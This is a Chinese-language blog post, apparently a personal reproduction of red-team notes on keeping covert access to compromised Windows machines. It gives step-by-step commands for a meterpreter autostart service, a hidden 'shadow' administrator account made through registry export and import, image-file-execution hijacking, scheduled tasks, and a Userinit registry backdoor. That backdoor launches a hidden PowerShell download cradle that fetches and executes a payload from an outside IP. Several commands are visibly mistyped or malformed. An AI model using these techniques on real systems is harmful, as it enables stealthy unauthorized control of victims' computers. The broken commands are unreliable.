前言

之前写过linux的权限,看到群里分享的权限呢维持.pdf,正好复现研究下win的权限维持。

windows权限维持

msf

meterperter里面执行,可以看到它改了注册表。

还可以这样 (该条命令执行成功后,会在目标系统自动创建一个 meterpreter 的 serverces ,并自动保存为开机自动启动!)

连接成功

后续再做些路由转发、抓密码的操作就不说了。

影子账户

这个也是很常见的手段了。

net user admin$ Test1 /add
net loclagroup administrators admin$ /add

可以看到虽然net user 看不到用户,但是在本地组用户是能看到的。需要改注册表完全隐藏。(如果注册表sam下打不开需要先赋予权限)

我们这里要找到Names里面的admin$和admin$对应的16进制目录,右键导出到桌面。然后使用net user admin$ /del 删除admin$用户。最后双击导出的两个注册表,添加进注册表里面。

可以看到用户组与net user都是看不到的,但是注册表中确实有这个用户且有管理员权限。

说白了就是先建立一个隐藏用户得到他的注册表值,然后删除这个用户,再把注册表导入。算是利用了win用户机制进行了一次欺骗。

映像劫持

微软官方方工工具: GFlages.exe
下载地址:
http://download.microsoft.com/download/A/6/A/A6AC035D-DA3F-4F0C-ADA4-37C8E5D34E3D/setup/WinSDKDebuggingTools_amd64/dbg_amd64.msi

用这个工具测试了下,的确可以让程序执行结束后执行制定程序。这比打开的是程序A,而而运行行行的确是程序更隐蔽。要管理员权限。

reg add "HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsnotepad.exe" /v GlobalFlag /t REG_DWORD /d 512

reg add "HKLMSOFTWAREMicrosoftWindows NTCurrentVersionSilentProcessExitnotepad.exe" /v ReportingMode /t REG_DWORD /d 1

reg add "HKLMSOFTWAREMicrosoftWindows NTCurrentVersionSilentProcessExitnotepad.exe" /v MonitorProcess /t REG_SZ /d "c:windowssystem32taskmgr.exe"

详情请看:https://www.anquanke.com/post/id/151425

userinit注册表后门

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit

这个注册表键的作用是在用户进行登陆时,winlogon运行指定的程序。根据官方文档,可以更改它的值来添加与删除程序。 可以绕过某些杀软以及Windows Defender。如果使用它启动powershell,还可以传递参数,就能够留下一个无文件的后门。

注销用户重新登录后启动了notepad。

powershell 实现 (这个是真的屌!然而没有成功不知道为啥,注册表也写进去了)

Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\WINDOWS NT\CurrentVersion\Winlogon" -name Userinit -value "C:\Windows\system32\userinit.exe,powershell.exe -w hidden -noexit -nop  -c $T=new-object net.webclient;$T.proxy=[Net.WebRequest]::GetSystemWebProxy();$T.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $T.downloadstring('http\\172.22.135.84\msf.dll');" 

计划任务

schtasks.exe /Create /TN update /TR xx(你要执行的命令)  /SC ONLOGON /F /RL HIGHEST

总结

根据360-redteam分享的资料复现的,找资料的时候这老哥博客写的也很全http://xnianq.cn/2018/07/23/windows%E5%90%8E%E9%97%A8%E7%A7%8D%E6%A4%8D%E6%96%B9%E5%BC%8F%E6%94%B6%E9%9B%86/